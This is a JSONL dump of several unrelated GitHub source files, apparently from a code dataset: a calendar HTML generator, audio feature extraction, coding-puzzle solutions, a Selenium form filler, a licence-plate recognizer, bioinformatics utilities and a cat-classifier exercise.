class=\\\"celebration\\\">\" + dateNmonth(f.endDate) +\"</span><br>\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tout.write(\"</span><br>\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tout.write(\"<br>\")\n\t\t\telif line.strip() == oneDayFastingsToken:\n\t\t\t\tfor f in oneDayFastings:\n\t\t\t\t\tout.write(\"<span class=\\\"celebration\\\">\" +dateNmonth(f.startDate) + \"</span> - \" + f.title + \"<br>\")\n\t\t\telif line.strip() == forbiddenTimesToken:\n\t\t\t\tfor f in forbiddenTimes:\n\t\t\t\t\tout.write(f.title)\n\t\t\t\t\tif (f.startDate):\n\t\t\t\t\t\tout.write(\" - <span class=\\\"celebration\\\">\" + dateNmonth(f.startDate))\n\t\t\t\t\t\tif(f.endDate):\n\t\t\t\t\t\t\tout.write(\" - \" + dateNmonth(f.endDate) +\"</span><br>\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tout.write(\"</span><br>\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tout.write(\"<br>\")\n\t\t\telif line.strip() == fastingFreeTimesToken:\n\t\t\t\tfor f in fastFreeTimes:\n\t\t\t\t\tout.write(\"з <span class=\\\"celebration\\\">\" + dateNmonth(f.startDate) + \"</span> по <span class=\\\"celebration\\\">\" + dateNmonth(f.endDate) + \"</span><br>\")\n\t\t\telif line.strip() == \"{{year}}\":\n\t\t\t\tout.write(repr(year))\n\t\t\telse:\n\t\t\t\tout.write(line)\n\t\tout.close();\n\t\ttemplate.close();\n\n\tprint (len(days))\n\tprint(\"Writing calendar to an output 
file\")\n\ninitCalendar()\nreadFastings()\nreadForbiddenTimes()\nreadFastFreeTimes()\nreadSaints()\nreadCelebr()\nreadAdditional()\nreadConditions()\nfilterEntries()\napplyEntries()\ncleanup()\nwriteHtml()\nwriteCalendar()\n\n","repo_name":"mykhaylo-/church-calendar","sub_path":"gc_calendar.py","file_name":"gc_calendar.py","file_ext":"py","file_size_in_byte":14565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71705905193","text":"import opensmile\nimport csv\n\n# Créer une instance de l'objet Smile avec la configuration spécifique\nconfig = opensmile.FeatureSet.eGeMAPSv02\nfeature_level = opensmile.FeatureLevel.LowLevelDescriptors\n\nsmile = opensmile.Smile(\n feature_set=config,\n feature_level=feature_level,\n num_channels=1,\n)\n\n# Chemin vers le fichier audio que vous souhaitez traiter\naudio_file = \"C:\\\\Users\\\\lisar\\\\Downloads\\\\PAF_2023\\\\PAF_2023\\\\Dataset\\\\Interactions\\\\9\\\\person1.wav\"\n\n# Définir les noms des fonctionnalités que vous souhaitez extraire\nfeature_names = [\n \"frameIndex\",\n \"F0semitoneFrom27.5Hz_sma3nz_mean\",\n \"F0semitoneFrom27.5Hz_sma3nz_stddev\",\n \"F0semitoneFrom27.5Hz_sma3nz_minimum\",\n \"F0semitoneFrom27.5Hz_sma3nz_maximum\",\n \"F0semitoneFrom27.5Hz_sma3nz_range\",\n \"voiceProb_sma3nz_mean\",\n \"pcm_LOGenergy_sma3nz_mean\",\n \"pcm_fftMag_fband250-650_sma3_stddev\",\n \"pcm_zcr_sma3_stddev\",\n \"pcm_fftMag_spectralRollOff25.0_sma3_stddev\",\n \"pcm_fftMag_spectralCentroid_sma3_stddev\",\n]\n\n# Extraire les fonctionnalités spécifiées à partir du fichier audio\nfeatures = smile.process_file(audio_file, feature_names=feature_names)\n\n# Afficher les fonctionnalités extraites\nfor feature_name, feature_value in features.items():\n print(f\"{feature_name}: {feature_value}\")\n\n\n# Chemin vers le fichier CSV de sortie\noutput_file = \"C:\\\\Users\\\\lisar\\\\Documents\\\\paf.csv\"\n\n# Écrire les fonctionnalités extraites dans le fichier CSV\nwith open(output_file, 'w', newline='') as csvfile:\n writer = csv.writer(csvfile)\n \n # Écrire l'en-tête (noms des fonctionnalités)\n writer.writerow(features.keys())\n \n # Écrire les valeurs des fonctionnalités\n writer.writerow([value for value in features.values()])\n\nprint(\"Extraction terminée. Les résultats ont été enregistrés dans le fichier CSV.\")\n","repo_name":"lisarosilio/PAF-ConfianceHumainRobot","sub_path":"paf/featurespaf.py","file_name":"featurespaf.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73358891112","text":"'''\nGiven a list of land plots with their prices and a maximum budget.\n\nFind the size of largest contiguous plot of land you can purchase under the given budget\n\nExample:\n \n Input: [1, 1, 3, 2, 4, 3, 2], budget = 7\n Output: 4\n Why? 
{"seq_id":"73358891112","text":"'''\nGiven a list of land plots with their prices and a maximum budget.\n\nFind the size of the largest contiguous plot of land you can purchase under the given budget.\n\nExample:\n    \n    Input: [1, 1, 3, 2, 4, 3, 2], budget = 7\n    Output: 4\n    Why? [1, 1, 3, 2]\n\n'''\nimport queue\ndef maximum_budget(arr, budget):\n    global_len = 0\n    current_max = 0\n    current_len = 0\n    q = queue.Queue()\n    for i in arr:\n        # grow the window by the next plot\n        q.put(i)\n        current_max += i\n        current_len += 1\n        # shrink from the left until the window fits the budget again\n        while current_max > budget:\n            current_max -= q.get()\n            current_len -= 1\n        if current_len > global_len:\n            global_len = current_len\n    return global_len\n\ndef max_budget(arr, budget):\n    # same sliding-window idea, tracking the left edge by index instead of a queue\n    best = 0\n    total = 0\n    start = 0\n    for end in range(len(arr)):\n        total += arr[end]\n        while total > budget:\n            total -= arr[start]\n            start += 1\n        best = max(best, end - start + 1)\n    return best\n\n\n\nprint(max_budget([1, 1, 3, 2, 4, 3, 2], budget = 7))\nprint(maximum_budget([5, 1, 1, 2, 1, 1, 2], budget = 7))\n\n\n    ","repo_name":"Ashi-s/coding_problems","sub_path":"DevPost/sliding_window_max_budget.py","file_name":"sliding_window_max_budget.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
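# Tracing the window above on the docstring example [1, 1, 3, 2, 4, 3, 2]
# with budget 7:
#   grow:  [1] -> [1,1] -> [1,1,3] -> [1,1,3,2]   (sum 7, length 4)
#   add 4: sum 11 > 7, shrink to [3,2,4] (sum 9), then [2,4] (sum 6)
#   no later window beats length 4, so both functions return 4.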
{"seq_id":"32784363548","text":"puzzle_input = open(\"Day 11/puzzleinput.txt\").read().splitlines()\n\ndef CountAdjacent(grid,row,col,char):\n    width = len(grid[0]) - 1\n    height = len(grid) - 1\n    count = 0\n    if row > 0:\n        count += (grid[row-1][col] == char)\n    if row < height:\n        count += (grid[row+1][col] == char)\n    if col > 0:\n        count += (grid[row][col-1] == char)\n    if col < width:\n        count += (grid[row][col+1] == char)\n    if row > 0 and col > 0:\n        count += (grid[row-1][col-1] == char)\n    if row > 0 and col < width:\n        count += (grid[row-1][col+1] == char)\n    if row < height and col > 0:\n        count += (grid[row+1][col-1] == char)\n    if row < height and col < width:\n        count += (grid[row+1][col+1] == char)\n    return count\n\ndef CountVisible(grid,row,col):\n    width = len(grid[0]) - 1\n    height = len(grid) - 1\n    count = 0\n    directions = [(0,1),(1,1),(1,0),(1,-1),(0,-1),(-1,-1),(-1,0),(-1,1)]\n    for delti,deltj in directions:\n        row2 = row + delti\n        col2 = col + deltj\n        while (0 <= row2 <= height) and (0 <= col2 <= width):\n            if grid[row2][col2] == \"L\":\n                break\n            if grid[row2][col2] == \"#\":\n                count += 1\n                break\n            row2 += delti\n            col2 += deltj\n    return count\n\ndef UpdateSeats(grid):\n    changes = 0\n    newgrid = [\"\" for x in range(len(grid))]\n    for i in range(len(grid)):\n        for j in range(len(grid[0])):\n            if grid[i][j] == \"L\" and CountVisible(grid,i,j) == 0:\n                newgrid[i] += \"#\"\n                changes += 1\n            elif grid[i][j] == \"#\" and CountVisible(grid,i,j) >= 5:\n                newgrid[i] += \"L\"\n                changes += 1\n            else:\n                newgrid[i] += grid[i][j]\n    if changes == 0:\n        print(\"no changes!\")\n        return False\n    return newgrid\n\ngrid = puzzle_input\n\n# advance one state per iteration, reusing the freshly computed grid\nnewgrid = UpdateSeats(grid)\nwhile newgrid:\n    grid = newgrid\n    newgrid = UpdateSeats(grid)\n\noccupied = 0\nfor row in grid:\n    occupied += row.count(\"#\")\n\nprint(grid[0])\nprint(occupied)\n\n\n","repo_name":"Dwittyy/AdventOfCode","sub_path":"2020/Day 11/Day 11b.py","file_name":"Day 11b.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"35161677945","text":"import json\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver import ActionChains\n\nbrowser = webdriver.Firefox()\nbrowser.get(\"https://www.google.com\")\n#{id|id_name OR name|field_name : [type, value]}\nform_values = {\n    # \"id|username\" : ['text' ,'brandon'],\n    # \"id|password\" : ['text' ,'password'],\n    \"name|q\" : ['text',\"hello world\"],\n    \"name|btnK\" : ['submit']\n}\n    \ndef fulfill_form(form_values):\n    for field_id, value in form_values.items():\n        \n        type_label = field_id.split(\"|\")\n        if len(type_label) == 2:\n            if type_label[0].lower() == \"id\":\n                elem = browser.find_element(By.ID, type_label[1])\n                if value[0].lower() == \"submit\":\n                    print(\"Submitting form!\")\n                    elem.click()\n                else:\n                    elem.send_keys(value[-1] + Keys.RETURN)\n\n            if type_label[0].lower() == \"name\":\n                print(f\"going to {type_label[1]}!\")\n                elem = browser.find_element(By.NAME, type_label[1])\n                if value[0].lower() == \"submit\":\n                    print(\"Submitting form!\")\n                    elem.click()\n                else:\n                    elem.send_keys(value[-1] + Keys.RETURN)\n        else:\n            print(f\"there is something wrong with your value {field_id}, use id|id_name or name|field_name\")\n\n\ndef cli():\n    form_values = {}\n    more_form_values = True\n    while more_form_values:\n        _new_val = input(\"input new value EX 'id|id_value' OR 'name|name_value':\\n\")\n        _form_type = input(\"what is the field type? \\n 1 : text, 2 : submit\")\n        while _form_type not in (\"1\", \"2\"):\n            _form_type = input(\"what is the field type? \\n 1 : text, 2 : submit\")\n        # store the same ['type', value] shape that fulfill_form expects\n        if _form_type == \"1\":\n            _form_value = input(\"what is the desired value?: \")\n            form_values[_new_val] = ['text', _form_value]\n        else:\n            form_values[_new_val] = ['submit']\n        _more_data = input(\"Do you have more to add?(y/n)\")\n        more_form_values = _more_data == \"y\"\n    fulfill_form(form_values)\n\n    \ndef import_from_json(json_file):\n    with open(json_file, \"r\") as jf:\n        jfr = jf.read()\n    form_values = json.loads(jfr)\n    fulfill_form(form_values)\n","repo_name":"yothebob/auto-form-tester","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
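# A usage sketch for import_from_json() above; the file name is hypothetical and
# the JSON must have the same {"locator": ["type", value]} shape as form_values:
#
#   with open("form.json", "w") as f:
#       f.write('{"name|q": ["text", "hello world"], "name|btnK": ["submit"]}')
#   import_from_json("form.json")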
{"seq_id":"15215952024","text":"import sys\nimport cvlib\nimport numpy as np\nimport cv2 as cv\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom joblib import load\n\n\nkernel_cross = np.array([[  0, 255,   0],\n                        [255, 255, 255],\n                        [  0, 255,   0]], np.uint8)\n\n\n\ndef find_plate(input_filename, b = 1, dila = 1):\n    \"\"\" Detects the plate and returns the location and dimensions of the plate in the image. \n\n    Args:\n    - input_filename (str): path of the image to process \n    - b (int, optional): strength of the blur applied to the image. Defaults to 1.\n    - dila (int, optional): strength of the dilation applied to the image. Defaults to 1.\n\n    Returns:\n    - x (int): x position where the plate was found \n    - y (int): y position where the plate was found\n    - w (int): width of the plate\n    - h (int): height of the plate \n\n    Everything is returned as a tuple.\n    \"\"\"\n    \n    print(\"---PLATE DETECTION---\")\n    # grayscale image \n    img_gray = cv.imread(input_filename, cv.IMREAD_GRAYSCALE)\n    #cvlib.imgview(img_gray, title = \"Grayscale\")\n\n    # color image\n    img_color = cv.imread(input_filename,cv.IMREAD_COLOR) \n    img_color = cv.cvtColor(img_color,cv.COLOR_BGR2RGB)\n    #cvlib.imgview(img_color, title= \"Color\")\n\n    # Blur the image \n    img_blur = img_gray.copy()\n    if b > 0: \n        img_blur = cv.blur(img_gray,(b,b))\n        t = \"Blur \" + str(b)\n    \n\n    # Binarization \n    imgbin = cv.adaptiveThreshold(img_blur, 255,cv.ADAPTIVE_THRESH_GAUSSIAN_C, cv.THRESH_BINARY_INV,11,5)\n\n\n    # Dilation\n    dilateded = cv.dilate(imgbin, kernel_cross, iterations = dila)\n\n    # Contour extraction \n    mode = cv.RETR_TREE \n    method = [cv.CHAIN_APPROX_NONE, cv.CHAIN_APPROX_SIMPLE]\n    contours, hierarchy = cv.findContours(dilateded, mode, method[1])\n\n    # Draw all contours\n    color = (0,255,0) #(r,g,b)\n    thickness = 2\n    r1 = cv.cvtColor(imgbin.copy(),cv.COLOR_GRAY2RGB)\n    for i in range(len(contours)):\n        r1 = cv.drawContours(r1, contours, i, color, thickness)\n\n\n    # Search for the most rectangular contour\n    indice = 0\n    extent_mayor = 0.0\n\n    for i in range(len(contours)):\n        cnt = contours[i]\n        area = cv.contourArea(cnt)\n        x,y,w,h = cv.boundingRect(cnt)\n        rect_area = w*h\n        extent = float(area)/rect_area\n\n        area_imagen = img_gray.shape[0] * img_gray.shape[1]\n        area_de_placa = area / area_imagen\n\n        \n        if w >= h:\n            if (extent > extent_mayor): #and (len(contours_internos) > 1):\n                indice = i\n                extent_mayor = extent\n        else:\n            if (extent > extent_mayor) and (area_de_placa >= 0.04): #and (len(contours_internos) > 1):\n                indice = i\n                extent_mayor = extent\n\n    # Draw the best-fitting contour\n    index = indice\n    color = (0,255,0) #(r,g,b)\n    thickness = 2\n    r3 = img_color.copy()\n    r3 = cv.drawContours(r3, contours, index, color, thickness)\n\n\n\n    # Plate area relative to image area \n    area = cv.contourArea(contours[index])\n    area_imagen = img_gray.shape[0] * img_gray.shape[1]\n    area_de_placa = area / area_imagen\n    \n    # Image crop\n    x,y,w,h = cv.boundingRect(contours[index])\n\n\n    print(\"Done.\")\n    return x, y, w, h\n\n\n\ndef find_numbers2(input_filename):\n    \"\"\" Receives the path of the image, locates the plate through the find_plate function and extracts the plate characters with the help of a model \n\n    Args:\n        input_filename (str): path of the input image\n\n    return: \n        resultado (str): string with the plate characters; returns None if nothing is detected. \n    \"\"\"\n\n    # STEPS: \n    # - Plate detection (DONE)\n    # - Image loading (DONE)\n    # - Light or dark background detection (DONE)\n    # -- If the background is light, determine that it is not red\n    # - Binarization depending on whether the background is light or dark (DONE)\n    # - Plate type determination: type 1 horizontal 1 line, type 2 horizontal 2 lines, type 3 vertical 2 lines (DONE)\n    # - Contour extraction (DONE)\n    # - Contour filtering by proportions (DONE)\n    # - Contours packaged into a function (DONE)\n    # - Determine the order of the digits (DONE)\n    # - Crop the digits and pass them to the function (DONE)\n    # - Digit recognition with the model (DONE)\n    # - Drawing of the plate with the digits (DONE)\n    # - Return of the digits (DONE)\n\n    # Plate detection\n    x1, y1, w1, h1 = find_plate(input_filename, 1, 1)\n\n    color = (0,255,0) \n\n    print(\"\\n\\n---DIGIT DETECTION---\")\n    # Read in color \n    img_color = cv.imread(input_filename,cv.IMREAD_COLOR) \n    img_color = cv.cvtColor(img_color,cv.COLOR_BGR2RGB)\n\n    # Read in grayscale\n    img_gray = cv.imread(input_filename, cv.IMREAD_GRAYSCALE)\n\n    # Crop - grayscale\n    img_re = img_gray[y1:y1+h1, x1:x1+w1]\n\n    # Crop - color\n    img_re_color = img_color[y1:y1+h1, x1:x1+w1]\n\n\n    # Binarization\n    imgbin = img_re.copy()\n    tresh = 91\n    hold = 5\n\n    imgbin = cv.adaptiveThreshold(img_re, 255,cv.ADAPTIVE_THRESH_GAUSSIAN_C, cv.THRESH_BINARY_INV,tresh, hold)\n\n    # Histogram of the binarized image\n    histr_imgbin = cv.calcHist([imgbin],None,None,[256],[0,256])\n\n    if histr_imgbin[0][0] < histr_imgbin[255][0]:\n        imgbin = 255 - imgbin\n    \n\n    # Opening - erosion followed by dilation\n    kernel_cross = np.array([[  0, 255,   0],\n                            [255, 255, 255],\n                            [  0, 255,   0]], np.uint8)\n    imgbin = cv.morphologyEx(imgbin, cv.MORPH_OPEN, kernel_cross)\n    \n    # Contour extraction\n    mode = cv.RETR_TREE \n    method = [cv.CHAIN_APPROX_NONE, cv.CHAIN_APPROX_SIMPLE]\n    contours = cv.findContours(imgbin, mode, method[1])[0]\n\n\n\n    # HEIGHT/WIDTH RATIO \n    proporcion = float(h1 / w1)\n    # print(\"Ratio (Height/Width):\", float(proporcion)) \n\n\n    # Information stored for each digit\n    tipo = \"\" # plate type \n    lista_numeros = [] # list of contours\n    lista_rec = [] # list of cropped images preprocessed for the model \n    Xs = [] # X position\n    Ys = [] # Y position\n    Ws = [] # Width\n    Hs = [] # Height\n    nivel = [] # Indicates whether the character is on the first or second line\n\n    # Image for drawing the contours\n    r2 = cv.cvtColor(imgbin.copy(),cv.COLOR_GRAY2RGB) \n    \n\n    # DIGIT DETECTION BY PLATE TYPE \n    # Types: type 1 (horizontal, 1 line), type 2 (horizontal, 2 lines) and type 3 (vertical, 2 lines)\n    padding = 6\n    if proporcion <= 0.36:\n        print(\"TYPE 1: horizontal, 1 line\")\n        tipo = \"tipo1\"\n\n        for cnt in contours: \n            x,y,w,h = cv.boundingRect(cnt)\n\n            proporcion_altura = float(h/h1)\n            # proporcion_ancho = float(w/h)\n\n            if (h > w) and (proporcion_altura >= 0.60) and (proporcion_altura <= 0.85) and (x > 0) and ((x+w) < (x1+w1)) : # and (proporcion_ancho > 0.2): # keep the contour if it is taller than it is wide\n                \n                # crop the rectangle\n                rectangulo = imgbin[y:y+h, x:x+w]\n                rectangulo = np.pad(rectangulo, padding, 'constant', constant_values = 0)\n                rectangulo = 255 - rectangulo # line to change when using the binarized model\n                rectangulo = cv.resize(rectangulo, (75, 100))\n                \n                r2 = cv.rectangle(r2,(x,y),(x+w,y+h),(0,255,0),1)\n\n\n                # Store the digit information\n                lista_numeros.append(cnt)\n                lista_rec.append(rectangulo.flatten()) # the crop is stored flattened\n                Xs.append(x)\n                Ys.append(y)\n                Ws.append(w)\n                Hs.append(h)\n\n        # Classify the digits by line \n        if len(Ys) > 0:\n            min_y = np.min(Ys)\n\n            for i in Ys:\n                if i < (min_y + 15): \n                    nivel.append(1)\n                else: \n                    nivel.append(2)\n\n    elif proporcion > 0.36 and proporcion < 1.0:\n        print(\"TYPE 2: horizontal, 2 lines\")\n\n        tipo = \"tipo2\"\n        \n        for cnt in contours: \n            x,y,w,h = cv.boundingRect(cnt)\n\n            proporcion_altura = float(h/h1)\n\n            if (h > w) and (proporcion_altura >= 0.30) and (proporcion_altura <= 0.45) and (x > 0) and ((x+w) < (x1+w1)) : # and (proporcion_ancho > 0.2): # keep the contour if it is taller than it is wide\n                \n\n                # crop the rectangle\n                rectangulo = imgbin[y:y+h, x:x+w]\n                rectangulo = np.pad(rectangulo, padding, 'constant', constant_values = 0)\n                rectangulo = 255 - rectangulo # line to change when using the binarized model\n                rectangulo = cv.resize(rectangulo, (75, 100))\n                \n                r2 = cv.rectangle(r2,(x,y),(x+w,y+h),(0,255,0),1)\n\n                # Store the digit information\n                lista_numeros.append(cnt)\n                lista_rec.append(rectangulo.flatten())\n                Xs.append(x)\n                Ys.append(y)\n                Ws.append(w)\n                Hs.append(h)\n\n        # Classify the digits by line \n        if len(Ys) > 0:\n            min_y = np.min(Ys)\n\n            for i in Ys:\n                if i < (min_y + 15): \n                    nivel.append(1)\n                else: \n                    nivel.append(2)\n\n    else: \n        print(\"TYPE 3: vertical, 2 lines\")\n\n        tipo = \"tipo3\"\n\n        for cnt in contours: \n            x,y,w,h = cv.boundingRect(cnt)\n\n            proporcion_altura = float(h/h1)\n\n            if (h > w) and (proporcion_altura >= 0.25) and (proporcion_altura <= 0.45) and (x > 0) and ((x+w) < (x1+w1)) : # and (proporcion_ancho > 0.2): # keep the contour if it is taller than it is wide\n\n            \n                # crop the rectangle\n                rectangulo = imgbin[y:y+h, x:x+w]\n                rectangulo = np.pad(rectangulo, padding, 'constant', constant_values = 0)\n                rectangulo = 255 - rectangulo # line to change when using the binarized model\n                rectangulo = cv.resize(rectangulo, (75, 100))\n                \n                # Store the digit information\n                r2 = cv.rectangle(r2,(x,y),(x+w,y+h),(0,255,0),1)\n                lista_numeros.append(cnt)\n                lista_rec.append(rectangulo.flatten())\n                Xs.append(x)\n                Ys.append(y)\n                Ws.append(w)\n                Hs.append(h)\n\n        \n        # Classify the digits by line \n        if len(Ys) > 0:\n            min_y = np.min(Ys)\n\n            for i in Ys:\n                if i < (min_y + 15): \n                    nivel.append(1)\n                else: \n                    nivel.append(2)\n\n    \n    # DataFrame with the plate digits \n    numeros = pd.DataFrame({\n        'X': Xs,\n        'Y': Ys,\n        'W': Ws,\n        'H': Hs, \n        'Nivel': nivel, \n        'Contornos': lista_numeros, \n        'Rectangulos': lista_rec\n    })\n\n\n\n\n    # DIGIT RECOGNITION\n    if numeros.shape[0] > 0: # If no characters were found, the prediction is skipped. \n        lista = []\n        lista2 = []\n\n        if tipo == \"tipo1\":\n            lista = numeros.sort_values(by=[\"X\", \"Y\"], ascending=True).to_numpy()\n            lista2 = numeros.sort_values(by=[\"X\", \"Y\"], ascending=True)\n        elif (tipo == \"tipo2\") or (tipo == \"tipo3\") :\n            lista_ordenada = numeros.sort_values(by=[\"Nivel\",\"X\"], ascending=True).groupby('Nivel')\n            \n            lista = lista_ordenada.head(numeros.shape[0]).reset_index(drop=True).to_numpy()\n            lista2 = lista_ordenada.head(numeros.shape[0]).reset_index(drop=True)\n\n\n        # Draw the order of the digits \n        font = cv.FONT_HERSHEY_SIMPLEX\n        fontScale = 1\n        color = (0, 0, 255)\n        thickness = 2\n\n        for i in range(len(lista)): \n            org = (lista[i][0]+4, lista[i][1])\n            r2 = cv.putText(r2, str(i), org, font, \n                            fontScale, color, thickness, cv.LINE_AA)\n        \n        # PREDICTION \n        modelo = load('modelos/modelo.joblib') \n        label = load('modelos/label_encoder.joblib')\n\n        # Prepare the input\n        numeros_input = lista2[[\"Rectangulos\"]].to_numpy()[:,0]\n        numeros_ouput = modelo.predict(numeros_input.tolist())\n        numeros_ouput = label.inverse_transform(numeros_ouput)\n\n        # Drop the first 2 'I' letters \n        if len(numeros_ouput) > 2: \n            if (numeros_ouput[0] == \"I\") and (numeros_ouput[1] == \"I\"):\n                \n                numeros_ouput = numeros_ouput[2:]\n\n                lista2 = lista2.iloc[2:]\n            \n\n        print(\"List of digits:\", numeros_ouput)\n        print(\"Plate digits:\", \"\".join(numeros_ouput))\n\n\n        # DRAW THE FINAL IMAGE \n        thickness = 2\n        color = (0,255,0) #(r,g,b)\n\n        # PLATE \n        imagen_final = img_color.copy()\n        imagen_final = cv.rectangle(imagen_final,(x1,y1),(x1+w1,y1+h1),color,thickness)\n\n        # DIGITS\n        for fila in lista2.to_numpy():\n            x, y, w, h = fila[0:4]\n\n            x = x + x1\n            y = y + y1\n            \n            imagen_final = cv.rectangle(imagen_final,(x,y),(x+w,y+h),color,thickness)\n\n        # TEXT\n        resultado = \"\".join(numeros_ouput)\n        org = (x1, y1-4)\n        imagen_final = cv.putText(imagen_final, resultado, org, font, \n                        fontScale, color, thickness, cv.LINE_AA)\n\n        cvlib.imgview(imagen_final)\n\n        print(\"\\n\\n\")\n\n        return resultado\n    \n    else: \n        color = (0,255,0) \n        thickness = 2\n        imagen_final = img_color.copy()\n        imagen_final = cv.rectangle(imagen_final,(x1,y1),(x1+w1,y1+h1),color,thickness)\n        cvlib.imgview(imagen_final)\n        print(\"No digits were detected\")\n\n        print(\"\\n\\n\")\n        return None\n    \n\n\n\n# EXECUTION\nargs = sys.argv\nbandera = \"--p\"\npath = \"fprint3.pgm\"\n\n\n# FLAG\ntry:\n    bandera = args[1]\n    if bandera == \"--p\":\n        pass\n    else:\n        print(f\"warning: {bandera} is not a known program argument\")\n        # print(\"use '--p' instead to indicate the path.\")\n        exit(0)\n\nexcept:\n    print(\"usage: you must include '--p' to indicate the file path.\")\n    exit(0)\n\n\n# PATH \ntry:\n    path = args[2]\nexcept:\n    print(\"warning: you must provide the path of the file to detect.\")\n    exit(0)\n\n\nprint(\"Filename:\", path)\n\n\nfind_numbers2(path)\n\nprint(\"--- END OF PROGRAM ---\")\n# print(\"Output filename:\", output_filename)","repo_name":"CruzdelCid/Detector-de-Placas","sub_path":"detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":14840,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
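# A command-line usage sketch for the detector above; the image path is
# hypothetical:
#
#   python detector.py --p images/plate.jpg
#
# which runs find_numbers2("images/plate.jpg") and prints the recognized digits.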
{"seq_id":"1448117590","text":"#!/usr/bin/env python\n# Author: Duy Tin Truong (duytin.truong@unitn.it)\n#\t\tat CIBIO, University of Trento, Italy\n\n__author__ = 'Duy Tin Truong (duytin.truong@unitn.it)'\n__version__ = '0.1'\n__date__ = '1st Sep 2014'\n\nimport numpy\nimport sys\nimport bz2  # required by openr/openw below\n\ndef dist2file(dist, labels, ofn):\n    with open(ofn, 'w') as ofile:\n        ofile.write('ID')\n        for label in labels:\n            ofile.write('\\t%s'%label)\n        ofile.write('\\n')\n        for i in range(len(labels)):\n            ofile.write('%s\\t'%labels[i])\n            for j in range(len(labels)):\n                if j == len(labels) - 1:\n                    ofile.write('%f\\n'%dist[i][j])\n                else:\n                    ofile.write('%f\\t'%dist[i][j])\n\n\n\ndef statistics(vals):\n    vals = numpy.array(vals)\n    result = {}\n    if len(vals.shape) == 1:\n        num_elems = len(vals)\n        nrows = num_elems\n        ncols = 1\n    else:\n        nrows, ncols = vals.shape\n        num_elems = nrows * ncols\n    if num_elems > 0:\n        result['nrows'] = nrows\n        result['ncols'] = ncols\n        result['size'] = num_elems\n        result['average'] = numpy.average(vals)\n        result['min'] = numpy.min(vals)\n        result['max'] = numpy.max(vals)\n        result['median'] = numpy.percentile(vals, 50)\n        result['percentile_25'] = numpy.percentile(vals, 25)\n        result['percentile_75'] = numpy.percentile(vals, 75)\n    else:\n        result['nrows'] = nrows\n        result['ncols'] = ncols\n        result['size'] = num_elems\n        result['average'] = 0\n        result['min'] = 0\n        result['max'] = 0\n        result['median'] = 0\n        result['percentile_25'] = 0\n        result['percentile_75'] = 0\n\n    str_result = ''\n    for key in ['nrows',\n                'ncols',\n                'size',\n                'average',\n                'min',\n                'max',\n                'median',\n                'percentile_25',\n                'percentile_75']:\n        str_result += '%s: %s\\n'%(key, result[key])\n\n    return result, str_result\n\n\n\ndef dict2str(dict_var):\n    result = ''\n    for key in dict_var:\n        result += '%s: %s\\n'%(key, dict_var[key])\n    return result\n\n\ndef openr( fn, mode = \"r\" ):\n    if fn is None:\n        return sys.stdin\n    return bz2.BZ2File(fn) if fn.endswith(\".bz2\") else open(fn,mode)\n    \n\ndef openw( fn ):\n    if fn is None:\n        return sys.stdout\n    return bz2.BZ2File(fn,\"w\") if fn.endswith(\".bz2\") else open(fn,\"w\")\n    \n\ndef is_number(s):\n    try:\n        int(s)\n        return True\n    except ValueError:\n        return False\n","repo_name":"biobakery/MetaPhlAn2","sub_path":"strainphlan_src/mixed_utils.py","file_name":"mixed_utils.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"72"}
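# A quick usage sketch of statistics() from the module above:
#
#   result, text = statistics([1.0, 2.0, 3.0, 4.0])
#   result['average']   # 2.5
#   result['median']    # 2.5
#   result['size']      # 4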
are given a dataset (\"data.h5\") containing:\r\n##- a training set of m_train images labeled as cat (y=1) or non-cat (y=0)\r\n\r\n##- a test set of m_test images labeled as cat or non-cat\r\n\r\n##- each image is of shape (num_px, num_px, 3) where 3 is for the 3 channels (RGB).\r\n## Thus, each image is square (height = num_px) and (width = num_px)\r\n\r\n# Loading the data (cat/non-cat)\r\ntrain_set_x_orig, train_set_y, test_set_x_orig, test_set_y, classes = load_dataset()\r\n# We added \"_orig\" at the end of image datasets (train and test) because we are going\r\n# to preprocess them. After preprocessing, we will end up with train_set_x and\r\n# test_set_x (the labels train_set_y and test_set_y don't need any preprocessing).\r\n\r\n# Each line of your train_set_x_orig and test_set_x_orig is an array representing an image.\r\n# You can visualize an example by running the following code. Feel free also to change the\r\n# index value and re-run to see other images.\r\n\r\n# Example of a picture\r\nindex = 25\r\nplt.imshow(train_set_x_orig[index])\r\nprint (\"y = \" + str(train_set_y[:, index]) + \", it's a '\" + classes[np.squeeze(train_set_y[:, index])].decode(\"utf-8\") + \"' picture.\")\r\nplt.show()\r\n# Many software bugs in deep learning come from having matrix/vector dimensions that don't\r\n# fit. If you can keep your matrix/vector dimensions straight you will go a long way toward\r\n# eliminating many bugs.\r\n\r\n\r\n# Find the values for:\r\n\r\n# - m_train (number of training examples)\r\n# - m_test (number of test examples)\r\n# - num_px (= height = width of a training image)\r\n\r\n#Remember that train_set_x_orig is a numpy-array of shape (m_train, num_px, num_px, 3).\r\n# For instance, you can access m_train by writing train_set_x_orig.shape[0]\r\n\r\n\r\n#(≈ 3 lines of code)\r\nm_train = train_set_x_orig.shape[0]\r\nm_test = test_set_x_orig.shape[0]\r\nnum_px = train_set_x_orig.shape[2]\r\n\r\n\r\nprint (\"Number of training examples: m_train = \" + str(m_train))\r\nprint (\"Number of testing examples: m_test = \" + str(m_test))\r\nprint (\"Height/Width of each image: num_px = \" + str(num_px))\r\nprint (\"Each image is of size: (\" + str(num_px) + \", \" + str(num_px) + \", 